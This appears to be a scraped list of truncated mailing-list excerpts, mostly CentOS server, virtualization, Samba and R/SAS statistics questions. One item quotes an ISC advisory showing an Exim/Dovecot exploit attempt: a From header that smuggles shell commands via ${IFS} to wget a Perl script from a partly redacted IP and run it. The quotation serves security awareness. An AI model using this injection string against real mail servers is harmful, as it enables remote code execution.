Server reboots unexpectebly.
Dear group, I am in the process of configuring 2 new servers. They are running Centos 5.5 and for the last three days they have been rebooting unexpectedly, can you point me in the right direction what to look for in the logs. I have been checking /var/log/messages but don't see anything that hint me any clues why this is happening. Your input is much much appreciated. Lisandro PS. These are

VM Slowness
I hope this in the right list, but I was wondering if someone could help me with a VM I have that has lately started having problems. It had been running for years without problems. It's possible an update is causing this, but I can't say. The VM is running CentOS 5.8 and after a time, the machine begins to slow down. Things like pings or running commands lag. If I reboot the VM, it runs

Unstable printing w/3.2.0
I've upgraded my print server to CentOS5 w/Samba 3.2.0. While it "works" we are experiencing numerous irritating issues. I'm curious if anyone else is experencing these issues. 1.) Print jobs do not clear out of the CIFS queue. So we now have printers that show they have over 1,000 jobs in the queue although the queue is empty. This is a bug scheduled to be fixed in 3.2.1

RC4/1.0 and peeling
first, congrats to monty and the whole crew for getting this close to 1.0. it's a monumental achievement reflecting a huge amount of hard work -- kudos! econd, i know the bitrate peeling feature has been pushed back until after 1.0 is out. but i'm wondering -- will oggs created with a 1.0 encoder be peelable with an as-yet-unreleased utility, or do "peelable oggs" have to be

CentOS 5.6 and KVM failure
After updating to 5.6 on a server this morning, I can no longer boot two virtual machines. One is trixbox which I believe is a 32bit centos based distro, and the other vm is a 64bit Windows 2008 installation. The error I get in the virt-manager console is FATAL: No bootable device. Both VMs are qcow2 format, and I've checked file permissions. I'm going to boot a live cd in the trixbox vm

Vmware Server 2 and KVM....
I am finally starting to pull the plug on vmware 2 and want to start migrating to KVM, what I would like to know and I have searched but not found anything conclusive. Is it possible to run Vmware server 2 and KVM at the same time, I am running Centos 5.5 x64 on a 16 core 32g memory machine....the reason I would like to do this is that it would allow me to convert the vm's one at a time and

Median on Aggregated data
Folks, I have the following code, that works fine on smaller data sets. For larger datasets, it runs out of memory and runs way too slow because we are essentially creating large vectors with rep() and then calling median() on it. (I learned this approach from a post on the web). Below that, I have written the corresponding SAS code. The SAS code works fast because I can just tell the proc

scoping rules; summary
Hi everyone thanks for the replies. The issue was NOT a font problem; I deliberately chose ll1 and l11 as examples of easily confused variable names (evidently these were too easily confused ;-). The code snippet was written as intended, and increment() contained a deliberate, highlighted, bug. I was asking for guidance on avoiding/finding this sort of coding error. That was why I wrote

funding
Maybe what Centos needs is a bridal registry. Here in the US, an engaged couple can tell their friends what they'd like to be given as wedding presents. They do this by listing items in a registry, in various stores around town. Anyway, the idea is, post stuff you need in a list on your site. Say you need 20 hard drives, or a particular power supply, or whatever items that get consumed in

from ISC: Exim/Dovecot exploit making the rounds
One of our readers wrote in to let us know that he had received an attempted Exim/Dovecot exploit attempt against his email server. The exploit partially looked like this: From: x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com (Obviously edited for your safety, and I didn't post the whole thing.) S4 AD Domain Up; but no DNS auto-registration
samba-4.0.0 x86_64, CentOS6.3 My Samba4 / AD is up and running after migrating this weekend. Testing looked good and the domain *is working* but there are some issues. Automatic DNS update is not working. Workstations seem to be registering their names but joining a server to the domain works but fails with a error - and the DNS record is *not* added. BIC vz SBIC vz SIC
DeaRs, I have a doubt about: BIC (Bayesian Information Criterion) SBIC (Schwartz Bayesian Informarion Criterion) SIC (Schwartz Information Criterion) In many references these are know as the same (eg. stepAIC() function) but I just found a SAS8.2 output that show either the BIC and SIC values for a logistic regression.. simillary values but different. 1) question: What are the differences?
